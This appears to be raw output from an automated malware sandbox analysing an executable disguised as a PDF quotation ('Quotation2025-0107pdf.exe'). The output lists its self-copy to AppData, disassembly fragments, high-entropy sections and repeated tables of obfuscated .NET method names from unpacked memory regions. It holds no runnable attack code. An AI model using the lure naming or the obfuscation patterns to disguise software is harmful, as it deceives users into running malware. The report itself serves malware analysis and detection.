Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0A1B67F1 pushad ; iretd	0_2_0A1B67F3
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A76A59 push DEFFFFFEh; retf	9_2_00A76A5E
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A76F63 push edx; iretd	9_2_00A76F64
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 13_2_00402AC0 push eax; ret	13_2_00402AD4
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 13_2_00402AC0 push eax; ret	13_2_00402AFC

Source: Quotation2025-0107pdf.exe	Static PE information: section name: .text entropy: 7.401526227264673
Source: mexnJkivovwH.exe.0.dr	Static PE information: section name: .text entropy: 7.401526227264673

Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, IbChofHBavJhR0AihhL.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lfoL8HFeZe', 'ha8LUliL5e', 'wIXLo30fM4', 'vQGLu6Cd8h', 'gRsLWIqSLw', 'QfULDqeR1h', 'VPDLRDnOu3'
Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, tsV8XMYQesaCGZGGyJ.cs	High entropy of concatenated method names: 'zH3gdLsfL7', 'GTIgATpmr5', 'lOEg6ba8wq', 'X6Ygyq72vq', 'Dr1gCiphi5', 'unO6t2YICV', 'd556qY0lCD', 'nQ56hNM0OQ', 'KNG6rPpeIw', 'F8j6QcTK79'
Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, skE5SkQ10Ym0sHKx4c.cs	High entropy of concatenated method names: 'GUkeYbW8UU', 'l5pewCrs3m', 'YixeXVcgBp', 'cCyemHchUy', 'uPLeiQp0AS', 'ipHesOgvgf', 'SgyentrBXX', 'kQXe7ljDel', 'HqleK0dGXM', 'yaOebDEh24'
Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, qEgAcuoEHnySCyVCiE.cs	High entropy of concatenated method names: 'sATfkjrxTh', 'TVBf91dNIZ', 'VVgfYjS3Qg', 'GCEfw9sDdG', 'q7sfmIG5Y0', 'xEdfi7XHrf', 'IQNfn6OWu2', 'lWsf7A75s8', 'N6VfbIps1h', 'inif85KAnX'
Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, rx2adFKqKDDvpdwsNE.cs	High entropy of concatenated method names: 'AJWy4Nl5or', 'S1iyJCHBmM', 'KIjyxIUuCA', 'J0Dy0R6kyQ', 'x1Cy1rYI2U', 'JsRycT9IL2', 'oOFyOqXClQ', 'r2oykGWdCx', 'lEQy9bP8B4', 'cfmyaaOGGL'
Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, YJwornhL8NcUHM6d3H.cs	High entropy of concatenated method names: 'AdleVp5KX0', 'fXVeGJxhxm', 'F6oeerNqxF', 'NKve2IUPbK', 'LVPeIvcxBe', 'AiCevs6dIO', 'Dispose', 'YvaFj5ApOO', 'Sk2FA7Zq4x', 'tMMFPiRPK7'
Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, bY2l2W9aTvqvV3SIa6.cs	High entropy of concatenated method names: 'i7tP0rcAma', 'DVRPcYKoOb', 'KAMPkCSVFc', 'ni3P9N3MG8', 'yObPVcYRZi', 'mQ1P5hA0Lc', 'FSiPGuZ7KG', 'Hv0PFI0MYk', 'CGQPeMr0fP', 'BRNPL8vxPr'
Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, F7edAXSK92OBYECXq6.cs	High entropy of concatenated method names: 'lQTxs9hkv', 'GqJ0DsyJl', 'CbNcytVV4', 'QneOSAi9o', 'PBY9YuJXy', 'HQAa3y27i', 'hgxjV3DFItn00kKthB', 'KcSHfpestFmg0cqrIB', 'r8GF5Vcj0', 'kH5L9Pga3'
Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, Rp2frEnK0ssvc1GG09.cs	High entropy of concatenated method names: 'SdRyjBHoba', 'HNDyPDTV84', 'fLOygavwjW', 'HJEgZopU44', 'z6Tgz6ivjc', 'keEyBJcmK3', 'r9UyHLabEu', 'MJVySvZldv', 'gK3ylmC6jZ', 'XS6yNfTq2h'
Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, fZqjEMzUF5Mu3o6cex.cs	High entropy of concatenated method names: 'vUULcY6vXo', 'vejLkUuwn0', 'JrUL9MYGdE', 'X5ZLYccuDK', 'bfULwIXXVl', 'cfKLmTQFNO', 'B04LiBdpPQ', 'WfTLvCvagx', 'pUML46N62O', 'ogZLJSAoSF'
Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, q1NDsIahNrqhQyscMU.cs	High entropy of concatenated method names: 'nBs61LLEl9', 'ae36OA4pew', 'YE2PXV3lsR', 'B6VPmp75Gc', 'WsrPiGeQQx', 'aPWPsH1QeA', 'fEDPnvK6Gn', 'jI0P77ghml', 'BTxPKm9inR', 'CWePbh7YCP'
Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, AUokIxRdW3ZZkuiCsM.cs	High entropy of concatenated method names: 'BnrGTCkjXJ', 'BRHGEvcb5u', 'ToString', 'wxCGj0OxsT', 'qqZGAHrnk0', 'QDcGPTApPh', 'VYfG69vwIK', 'zp9GgbVE86', 'HW4GykGwGb', 'eELGCxwBRk'
Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, IodeJPNUOx7OkleCZR.cs	High entropy of concatenated method names: 'MIYHy6M6jn', 'NXAHCxGXHK', 'SaTHTvqvV3', 'cIaHE6G1ND', 'jscHVMU2sV', 'OXMH5QesaC', 'XSqxqG3IlbgqNnoqyE', 'OG14L2tdWAN5rA0p0o', 'PD6HHrgjTd', 'fNXHlavHR3'
Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, G6M6jnkKXAxGXHKNmU.cs	High entropy of concatenated method names: 'RhHAuyfVay', 'EjmAWgsBv0', 'cyZADh1wPG', 'dlQARVAKyh', 'V1JAtrYOZZ', 'K9VAqJigVX', 'lOvAhAoSeC', 'uIMArJuIbq', 'Iv7AQKXBuS', 'wZCAZpWt84'
Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, ld8Zy6HNxVOyY3u02Wr.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Dv83eB6BAM', 'eKH3LU0ctO', 'fSd32xwoeU', 'Sh033cAh9M', 'tcb3IWxvMR', 'm7O3MbcFyt', 'pE23vZnQtg'
Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, NhTCM9Z8e83c1vPLAZ.cs	High entropy of concatenated method names: 'JjNLPkN8R5', 'J9LL6G34Qr', 'ELsLgo0T0p', 'jotLyVkCHd', 'QCkLe8pli1', 'Xr9LCNYnRF', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, P8C9rkDoMuYdUq0kte.cs	High entropy of concatenated method names: 'ToString', 'RCE58DZcIi', 'bxH5wIxlRM', 'lRl5XfT1HJ', 'MGS5m2cgVJ', 'Oe35inHI28', 'xSH5sGBLmv', 'OWh5nEIULc', 'PSV57Zjk5o', 'bXd5K6Kdc9'
Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, mndwbrCbxIcjOGXSCv.cs	High entropy of concatenated method names: 'GivldaEnxd', 'fy0ljf0lU2', 'ofJlAUM4s4', 'OgplPyqTsn', 'TK9l6xSGrF', 'Ey9lgPt55u', 'yiDlyDHobo', 'X3mlCj2fc1', 'CdGlpGV9yZ', 'BetlTVwmyt'
Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, goVFEnuuIYdGElAf1P.cs	High entropy of concatenated method names: 'vykVbHNOKT', 'OUeVUWsclK', 'G9iVutd1h9', 'iLGVWIwvMU', 'DTxVwsv1Ab', 'wosVXS0v9g', 'trDVmKmDbI', 'XbsViGEwp4', 'A1aVsxiIK1', 'ucVVn0TCIk'
Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, YGKv1VHHY7YGJjaWvBI.cs	High entropy of concatenated method names: 'nI3LZxxUXD', 'iLnLzCkK9c', 'mOQ2BHuaDV', 'RNh2Hi9b4U', 'jkf2SundNl', 'uBM2lMpKbJ', 'xXc2Nwt4wf', 'lOd2d1QWdw', 'NVM2jvmX5S', 'Qb82AkLyyu'
Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, uqSudIA7xkgfkKu8uq.cs	High entropy of concatenated method names: 'Dispose', 'dcUHQHM6d3', 'JkjSw0PTv4', 'QJ2gijO3uO', 'asTHZkb1WS', 'qsXHzrjauA', 'ProcessDialogKey', 'UfLSBkE5Sk', 'B0YSHm0sHK', 'z4cSSKhTCM'
Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, BF0ad2PdcQycQg2Ypw.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'n77SQ5vIRj', 'CUcSZnFngs', 'gA6SzZm41d', 'vlKlBJ3MYl', 'LX1lHtEfOR', 'a4klStPnVD', 'caIllx590p', 'zKbJBukJpbZV2fvDCij'
Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, g2kfQWqWgG7d7Kou8E.cs	High entropy of concatenated method names: 'HjWGrrtISR', 'G5MGZ9AMyZ', 'f5YFBPT1vF', 'PlMFHwXnLI', 'qd1G8KQO4P', 'b3BGUV2xsv', 'dcnGob7QLw', 'VNHGuHtYkw', 'qfxGWKyyrt', 'Jj4GD1Slgd'
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, IbChofHBavJhR0AihhL.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lfoL8HFeZe', 'ha8LUliL5e', 'wIXLo30fM4', 'vQGLu6Cd8h', 'gRsLWIqSLw', 'QfULDqeR1h', 'VPDLRDnOu3'
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, tsV8XMYQesaCGZGGyJ.cs	High entropy of concatenated method names: 'zH3gdLsfL7', 'GTIgATpmr5', 'lOEg6ba8wq', 'X6Ygyq72vq', 'Dr1gCiphi5', 'unO6t2YICV', 'd556qY0lCD', 'nQ56hNM0OQ', 'KNG6rPpeIw', 'F8j6QcTK79'
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, skE5SkQ10Ym0sHKx4c.cs	High entropy of concatenated method names: 'GUkeYbW8UU', 'l5pewCrs3m', 'YixeXVcgBp', 'cCyemHchUy', 'uPLeiQp0AS', 'ipHesOgvgf', 'SgyentrBXX', 'kQXe7ljDel', 'HqleK0dGXM', 'yaOebDEh24'
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, qEgAcuoEHnySCyVCiE.cs	High entropy of concatenated method names: 'sATfkjrxTh', 'TVBf91dNIZ', 'VVgfYjS3Qg', 'GCEfw9sDdG', 'q7sfmIG5Y0', 'xEdfi7XHrf', 'IQNfn6OWu2', 'lWsf7A75s8', 'N6VfbIps1h', 'inif85KAnX'
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, rx2adFKqKDDvpdwsNE.cs	High entropy of concatenated method names: 'AJWy4Nl5or', 'S1iyJCHBmM', 'KIjyxIUuCA', 'J0Dy0R6kyQ', 'x1Cy1rYI2U', 'JsRycT9IL2', 'oOFyOqXClQ', 'r2oykGWdCx', 'lEQy9bP8B4', 'cfmyaaOGGL'
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, YJwornhL8NcUHM6d3H.cs	High entropy of concatenated method names: 'AdleVp5KX0', 'fXVeGJxhxm', 'F6oeerNqxF', 'NKve2IUPbK', 'LVPeIvcxBe', 'AiCevs6dIO', 'Dispose', 'YvaFj5ApOO', 'Sk2FA7Zq4x', 'tMMFPiRPK7'
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, bY2l2W9aTvqvV3SIa6.cs	High entropy of concatenated method names: 'i7tP0rcAma', 'DVRPcYKoOb', 'KAMPkCSVFc', 'ni3P9N3MG8', 'yObPVcYRZi', 'mQ1P5hA0Lc', 'FSiPGuZ7KG', 'Hv0PFI0MYk', 'CGQPeMr0fP', 'BRNPL8vxPr'
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, F7edAXSK92OBYECXq6.cs	High entropy of concatenated method names: 'lQTxs9hkv', 'GqJ0DsyJl', 'CbNcytVV4', 'QneOSAi9o', 'PBY9YuJXy', 'HQAa3y27i', 'hgxjV3DFItn00kKthB', 'KcSHfpestFmg0cqrIB', 'r8GF5Vcj0', 'kH5L9Pga3'
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, Rp2frEnK0ssvc1GG09.cs	High entropy of concatenated method names: 'SdRyjBHoba', 'HNDyPDTV84', 'fLOygavwjW', 'HJEgZopU44', 'z6Tgz6ivjc', 'keEyBJcmK3', 'r9UyHLabEu', 'MJVySvZldv', 'gK3ylmC6jZ', 'XS6yNfTq2h'
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, fZqjEMzUF5Mu3o6cex.cs	High entropy of concatenated method names: 'vUULcY6vXo', 'vejLkUuwn0', 'JrUL9MYGdE', 'X5ZLYccuDK', 'bfULwIXXVl', 'cfKLmTQFNO', 'B04LiBdpPQ', 'WfTLvCvagx', 'pUML46N62O', 'ogZLJSAoSF'
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, q1NDsIahNrqhQyscMU.cs	High entropy of concatenated method names: 'nBs61LLEl9', 'ae36OA4pew', 'YE2PXV3lsR', 'B6VPmp75Gc', 'WsrPiGeQQx', 'aPWPsH1QeA', 'fEDPnvK6Gn', 'jI0P77ghml', 'BTxPKm9inR', 'CWePbh7YCP'
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, AUokIxRdW3ZZkuiCsM.cs	High entropy of concatenated method names: 'BnrGTCkjXJ', 'BRHGEvcb5u', 'ToString', 'wxCGj0OxsT', 'qqZGAHrnk0', 'QDcGPTApPh', 'VYfG69vwIK', 'zp9GgbVE86', 'HW4GykGwGb', 'eELGCxwBRk'
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, IodeJPNUOx7OkleCZR.cs	High entropy of concatenated method names: 'MIYHy6M6jn', 'NXAHCxGXHK', 'SaTHTvqvV3', 'cIaHE6G1ND', 'jscHVMU2sV', 'OXMH5QesaC', 'XSqxqG3IlbgqNnoqyE', 'OG14L2tdWAN5rA0p0o', 'PD6HHrgjTd', 'fNXHlavHR3'
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, G6M6jnkKXAxGXHKNmU.cs	High entropy of concatenated method names: 'RhHAuyfVay', 'EjmAWgsBv0', 'cyZADh1wPG', 'dlQARVAKyh', 'V1JAtrYOZZ', 'K9VAqJigVX', 'lOvAhAoSeC', 'uIMArJuIbq', 'Iv7AQKXBuS', 'wZCAZpWt84'
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, ld8Zy6HNxVOyY3u02Wr.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Dv83eB6BAM', 'eKH3LU0ctO', 'fSd32xwoeU', 'Sh033cAh9M', 'tcb3IWxvMR', 'm7O3MbcFyt', 'pE23vZnQtg'
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, NhTCM9Z8e83c1vPLAZ.cs	High entropy of concatenated method names: 'JjNLPkN8R5', 'J9LL6G34Qr', 'ELsLgo0T0p', 'jotLyVkCHd', 'QCkLe8pli1', 'Xr9LCNYnRF', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, P8C9rkDoMuYdUq0kte.cs	High entropy of concatenated method names: 'ToString', 'RCE58DZcIi', 'bxH5wIxlRM', 'lRl5XfT1HJ', 'MGS5m2cgVJ', 'Oe35inHI28', 'xSH5sGBLmv', 'OWh5nEIULc', 'PSV57Zjk5o', 'bXd5K6Kdc9'
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, mndwbrCbxIcjOGXSCv.cs	High entropy of concatenated method names: 'GivldaEnxd', 'fy0ljf0lU2', 'ofJlAUM4s4', 'OgplPyqTsn', 'TK9l6xSGrF', 'Ey9lgPt55u', 'yiDlyDHobo', 'X3mlCj2fc1', 'CdGlpGV9yZ', 'BetlTVwmyt'
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, goVFEnuuIYdGElAf1P.cs	High entropy of concatenated method names: 'vykVbHNOKT', 'OUeVUWsclK', 'G9iVutd1h9', 'iLGVWIwvMU', 'DTxVwsv1Ab', 'wosVXS0v9g', 'trDVmKmDbI', 'XbsViGEwp4', 'A1aVsxiIK1', 'ucVVn0TCIk'
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, YGKv1VHHY7YGJjaWvBI.cs	High entropy of concatenated method names: 'nI3LZxxUXD', 'iLnLzCkK9c', 'mOQ2BHuaDV', 'RNh2Hi9b4U', 'jkf2SundNl', 'uBM2lMpKbJ', 'xXc2Nwt4wf', 'lOd2d1QWdw', 'NVM2jvmX5S', 'Qb82AkLyyu'
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, uqSudIA7xkgfkKu8uq.cs	High entropy of concatenated method names: 'Dispose', 'dcUHQHM6d3', 'JkjSw0PTv4', 'QJ2gijO3uO', 'asTHZkb1WS', 'qsXHzrjauA', 'ProcessDialogKey', 'UfLSBkE5Sk', 'B0YSHm0sHK', 'z4cSSKhTCM'
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, BF0ad2PdcQycQg2Ypw.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'n77SQ5vIRj', 'CUcSZnFngs', 'gA6SzZm41d', 'vlKlBJ3MYl', 'LX1lHtEfOR', 'a4klStPnVD', 'caIllx590p', 'zKbJBukJpbZV2fvDCij'
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, g2kfQWqWgG7d7Kou8E.cs	High entropy of concatenated method names: 'HjWGrrtISR', 'G5MGZ9AMyZ', 'f5YFBPT1vF', 'PlMFHwXnLI', 'qd1G8KQO4P', 'b3BGUV2xsv', 'dcnGob7QLw', 'VNHGuHtYkw', 'qfxGWKyyrt', 'Jj4GD1Slgd'
Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, DlRvq5yJkomY4LIf3S.cs	High entropy of concatenated method names: 'kZ9YdQeiiHN6iHHplRr', 'wEfHEVeR3qXSbOkcscO', 'RLbYs7foSU', 'PW2e71euAk0VMGlpcQV', 'gjVptie4PJx3mKSamWn', 'LKcyQ4eq4Fn8S34m92l', 'RgtTUJcyZL', 'TBNYf2t1gt', 'NdiYZfNUem', 'u6GYH5kC76'
Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, vH9V9oD7tIKkmfHnnj.cs	High entropy of concatenated method names: 'CO1Gqr7JX', 'O7OmLZJsW', 'AEjTXD5ed', 'DjTcZUKVY', 'V5WOgiNs3', 'ri688DDjg', 'pN9ncriqM', 'x0i4vkLXV', 'aFLjtabv9', 'zVDpUJsTO'
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, IbChofHBavJhR0AihhL.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lfoL8HFeZe', 'ha8LUliL5e', 'wIXLo30fM4', 'vQGLu6Cd8h', 'gRsLWIqSLw', 'QfULDqeR1h', 'VPDLRDnOu3'
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, tsV8XMYQesaCGZGGyJ.cs	High entropy of concatenated method names: 'zH3gdLsfL7', 'GTIgATpmr5', 'lOEg6ba8wq', 'X6Ygyq72vq', 'Dr1gCiphi5', 'unO6t2YICV', 'd556qY0lCD', 'nQ56hNM0OQ', 'KNG6rPpeIw', 'F8j6QcTK79'
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, skE5SkQ10Ym0sHKx4c.cs	High entropy of concatenated method names: 'GUkeYbW8UU', 'l5pewCrs3m', 'YixeXVcgBp', 'cCyemHchUy', 'uPLeiQp0AS', 'ipHesOgvgf', 'SgyentrBXX', 'kQXe7ljDel', 'HqleK0dGXM', 'yaOebDEh24'
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, qEgAcuoEHnySCyVCiE.cs	High entropy of concatenated method names: 'sATfkjrxTh', 'TVBf91dNIZ', 'VVgfYjS3Qg', 'GCEfw9sDdG', 'q7sfmIG5Y0', 'xEdfi7XHrf', 'IQNfn6OWu2', 'lWsf7A75s8', 'N6VfbIps1h', 'inif85KAnX'
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, rx2adFKqKDDvpdwsNE.cs	High entropy of concatenated method names: 'AJWy4Nl5or', 'S1iyJCHBmM', 'KIjyxIUuCA', 'J0Dy0R6kyQ', 'x1Cy1rYI2U', 'JsRycT9IL2', 'oOFyOqXClQ', 'r2oykGWdCx', 'lEQy9bP8B4', 'cfmyaaOGGL'
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, YJwornhL8NcUHM6d3H.cs	High entropy of concatenated method names: 'AdleVp5KX0', 'fXVeGJxhxm', 'F6oeerNqxF', 'NKve2IUPbK', 'LVPeIvcxBe', 'AiCevs6dIO', 'Dispose', 'YvaFj5ApOO', 'Sk2FA7Zq4x', 'tMMFPiRPK7'
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, bY2l2W9aTvqvV3SIa6.cs	High entropy of concatenated method names: 'i7tP0rcAma', 'DVRPcYKoOb', 'KAMPkCSVFc', 'ni3P9N3MG8', 'yObPVcYRZi', 'mQ1P5hA0Lc', 'FSiPGuZ7KG', 'Hv0PFI0MYk', 'CGQPeMr0fP', 'BRNPL8vxPr'
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, F7edAXSK92OBYECXq6.cs	High entropy of concatenated method names: 'lQTxs9hkv', 'GqJ0DsyJl', 'CbNcytVV4', 'QneOSAi9o', 'PBY9YuJXy', 'HQAa3y27i', 'hgxjV3DFItn00kKthB', 'KcSHfpestFmg0cqrIB', 'r8GF5Vcj0', 'kH5L9Pga3'
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, Rp2frEnK0ssvc1GG09.cs	High entropy of concatenated method names: 'SdRyjBHoba', 'HNDyPDTV84', 'fLOygavwjW', 'HJEgZopU44', 'z6Tgz6ivjc', 'keEyBJcmK3', 'r9UyHLabEu', 'MJVySvZldv', 'gK3ylmC6jZ', 'XS6yNfTq2h'
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, fZqjEMzUF5Mu3o6cex.cs	High entropy of concatenated method names: 'vUULcY6vXo', 'vejLkUuwn0', 'JrUL9MYGdE', 'X5ZLYccuDK', 'bfULwIXXVl', 'cfKLmTQFNO', 'B04LiBdpPQ', 'WfTLvCvagx', 'pUML46N62O', 'ogZLJSAoSF'
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, q1NDsIahNrqhQyscMU.cs	High entropy of concatenated method names: 'nBs61LLEl9', 'ae36OA4pew', 'YE2PXV3lsR', 'B6VPmp75Gc', 'WsrPiGeQQx', 'aPWPsH1QeA', 'fEDPnvK6Gn', 'jI0P77ghml', 'BTxPKm9inR', 'CWePbh7YCP'
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, AUokIxRdW3ZZkuiCsM.cs	High entropy of concatenated method names: 'BnrGTCkjXJ', 'BRHGEvcb5u', 'ToString', 'wxCGj0OxsT', 'qqZGAHrnk0', 'QDcGPTApPh', 'VYfG69vwIK', 'zp9GgbVE86', 'HW4GykGwGb', 'eELGCxwBRk'
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, IodeJPNUOx7OkleCZR.cs	High entropy of concatenated method names: 'MIYHy6M6jn', 'NXAHCxGXHK', 'SaTHTvqvV3', 'cIaHE6G1ND', 'jscHVMU2sV', 'OXMH5QesaC', 'XSqxqG3IlbgqNnoqyE', 'OG14L2tdWAN5rA0p0o', 'PD6HHrgjTd', 'fNXHlavHR3'
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, G6M6jnkKXAxGXHKNmU.cs	High entropy of concatenated method names: 'RhHAuyfVay', 'EjmAWgsBv0', 'cyZADh1wPG', 'dlQARVAKyh', 'V1JAtrYOZZ', 'K9VAqJigVX', 'lOvAhAoSeC', 'uIMArJuIbq', 'Iv7AQKXBuS', 'wZCAZpWt84'
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, ld8Zy6HNxVOyY3u02Wr.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Dv83eB6BAM', 'eKH3LU0ctO', 'fSd32xwoeU', 'Sh033cAh9M', 'tcb3IWxvMR', 'm7O3MbcFyt', 'pE23vZnQtg'
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, NhTCM9Z8e83c1vPLAZ.cs	High entropy of concatenated method names: 'JjNLPkN8R5', 'J9LL6G34Qr', 'ELsLgo0T0p', 'jotLyVkCHd', 'QCkLe8pli1', 'Xr9LCNYnRF', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, P8C9rkDoMuYdUq0kte.cs	High entropy of concatenated method names: 'ToString', 'RCE58DZcIi', 'bxH5wIxlRM', 'lRl5XfT1HJ', 'MGS5m2cgVJ', 'Oe35inHI28', 'xSH5sGBLmv', 'OWh5nEIULc', 'PSV57Zjk5o', 'bXd5K6Kdc9'
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, mndwbrCbxIcjOGXSCv.cs	High entropy of concatenated method names: 'GivldaEnxd', 'fy0ljf0lU2', 'ofJlAUM4s4', 'OgplPyqTsn', 'TK9l6xSGrF', 'Ey9lgPt55u', 'yiDlyDHobo', 'X3mlCj2fc1', 'CdGlpGV9yZ', 'BetlTVwmyt'
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, goVFEnuuIYdGElAf1P.cs	High entropy of concatenated method names: 'vykVbHNOKT', 'OUeVUWsclK', 'G9iVutd1h9', 'iLGVWIwvMU', 'DTxVwsv1Ab', 'wosVXS0v9g', 'trDVmKmDbI', 'XbsViGEwp4', 'A1aVsxiIK1', 'ucVVn0TCIk'
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, YGKv1VHHY7YGJjaWvBI.cs	High entropy of concatenated method names: 'nI3LZxxUXD', 'iLnLzCkK9c', 'mOQ2BHuaDV', 'RNh2Hi9b4U', 'jkf2SundNl', 'uBM2lMpKbJ', 'xXc2Nwt4wf', 'lOd2d1QWdw', 'NVM2jvmX5S', 'Qb82AkLyyu'
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, uqSudIA7xkgfkKu8uq.cs	High entropy of concatenated method names: 'Dispose', 'dcUHQHM6d3', 'JkjSw0PTv4', 'QJ2gijO3uO', 'asTHZkb1WS', 'qsXHzrjauA', 'ProcessDialogKey', 'UfLSBkE5Sk', 'B0YSHm0sHK', 'z4cSSKhTCM'
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, BF0ad2PdcQycQg2Ypw.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'n77SQ5vIRj', 'CUcSZnFngs', 'gA6SzZm41d', 'vlKlBJ3MYl', 'LX1lHtEfOR', 'a4klStPnVD', 'caIllx590p', 'zKbJBukJpbZV2fvDCij'
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, g2kfQWqWgG7d7Kou8E.cs	High entropy of concatenated method names: 'HjWGrrtISR', 'G5MGZ9AMyZ', 'f5YFBPT1vF', 'PlMFHwXnLI', 'qd1G8KQO4P', 'b3BGUV2xsv', 'dcnGob7QLw', 'VNHGuHtYkw', 'qfxGWKyyrt', 'Jj4GD1Slgd'
Source: 0.2.Quotation2025-0107pdf.exe.9a00000.6.raw.unpack, DlRvq5yJkomY4LIf3S.cs	High entropy of concatenated method names: 'kZ9YdQeiiHN6iHHplRr', 'wEfHEVeR3qXSbOkcscO', 'RLbYs7foSU', 'PW2e71euAk0VMGlpcQV', 'gjVptie4PJx3mKSamWn', 'LKcyQ4eq4Fn8S34m92l', 'RgtTUJcyZL', 'TBNYf2t1gt', 'NdiYZfNUem', 'u6GYH5kC76'
Source: 0.2.Quotation2025-0107pdf.exe.9a00000.6.raw.unpack, vH9V9oD7tIKkmfHnnj.cs	High entropy of concatenated method names: 'CO1Gqr7JX', 'O7OmLZJsW', 'AEjTXD5ed', 'DjTcZUKVY', 'V5WOgiNs3', 'ri688DDjg', 'pN9ncriqM', 'x0i4vkLXV', 'aFLjtabv9', 'zVDpUJsTO'
